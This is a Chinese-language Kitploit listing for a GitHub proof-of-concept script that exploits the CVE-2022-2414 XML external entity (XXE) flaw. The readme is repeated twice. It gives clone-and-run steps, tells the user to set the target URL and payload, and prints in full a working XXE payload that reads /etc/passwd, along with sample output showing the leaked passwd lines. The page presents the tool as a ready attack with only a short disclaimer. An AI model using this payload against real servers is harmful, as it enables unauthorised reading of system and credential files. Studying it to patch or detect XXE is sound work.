Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-2414 — 是一个用于演示 XML 外部实体 (XXE) 漏洞利用的 PoC 脚本。 | Kitploit
工具/GitHubGitHub/geniuszly/cve-2022-2414
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubgeniuszly/cve-2022-2414

CVE-2022-2414

是一个用于演示 XML 外部实体 (XXE) 漏洞利用的 PoC 脚本。

查看仓库
31年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

英文

GenXMLExternalEntityExploit 是一个用于演示 XML 外部实体(XXE)漏洞利用的 PoC 脚本。该脚本利用 XML 载荷读取目标服务器上的敏感文件。它可用于安全测试、渗透测试或教育目的。

功能特性

  • 向指定服务器发送精心构造的 XML 载荷。
  • 利用 XXE 漏洞读取服务器文件。
  • 目标 URL 和载荷数据易于自定义。

使用方法

  1. 克隆仓库
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2022-2414
    
  2. 进入目录
    root@kitploit:~
    cd CVE-2022-2414
    
  3. 运行脚本 请确保你的机器上已安装 Python。
    root@kitploit:~
    python3 GenXMLExternalEntityExploit.py
    

配置

  • TARGET_URL:更新脚本中的 TARGET_URL 变量,将其指向你要测试的目标服务器。
  • XML_PAYLOAD:自定义脚本中的 XML_PAYLOAD 字符串,以指定特定的文件路径或服务端操作。
  • HEADERS:根据需要修改 HTTP 请求头。

示例

默认情况下,脚本使用以下载荷读取 /etc/passwd 文件:

root@kitploit:~
<!--?xml version="1.0" ?-->
<!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
  <Attributes/>
  <ProfileID>&fetchFile;</ProfileID>
</CertEnrollmentRequest>

示例输出

root@kitploit:~
Инициализация отправки XML-пейлоада на сервер...
Статус-код ответа: 200
Содержимое XML-ответа:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nологin
...

免责声明

本工具仅用于教育目的和经授权的安全测试。作者不对任何非法使用本工具的行为负责。

俄文

GenXMLExternalEntityExploit 是一个用于演示 XML 外部实体(XXE)漏洞利用的 PoC 脚本。该脚本使用 XML 载荷从目标服务器读取机密文件。可用于安全测试、渗透测试或教育目的。

功能特性

  • 向指定服务器发送构造好的 XML 载荷。
  • 利用 XXE 漏洞读取服务器上的文件。
  • 目标服务器 URL 地址和载荷内容易于配置。

使用方法

  1. 克隆仓库
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2022-2414
    
  2. 进入目录
    root@kitploit:~
    cd CVE-2022-2414
    
  3. 运行脚本 确保你已安装 Python。
    root@kitploit:~
    python3 GenXMLExternalEntityExploit.py
    

配置

  • TARGET_URL:将脚本中的 TARGET_URL 变量改为你要测试的服务器 URL 地址。
  • XML_PAYLOAD:配置 XML_PAYLOAD 字符串,以指定具体文件或服务端操作。
  • HEADERS:如有必要,修改 HTTP 请求头。

示例

默认情况下,脚本使用以下载荷读取 /etc/passwd 文件:

root@kitploit:~
<!--?xml version="1.0" ?-->
<!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
  <Attributes/>
  <ProfileID>&fetchFile;</ProfileID>
</CertEnrollmentRequest>

示例输出

root@kitploit:~
Инициализация отправки XML-пейлоада на сервер...
Статус-код ответа: 200
Содержимое XML-ответа:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nологin
...

免责声明

本工具仅用于教育目的和经授权的安全测试。作者不对任何非法使用本工具的行为负责。

下载工具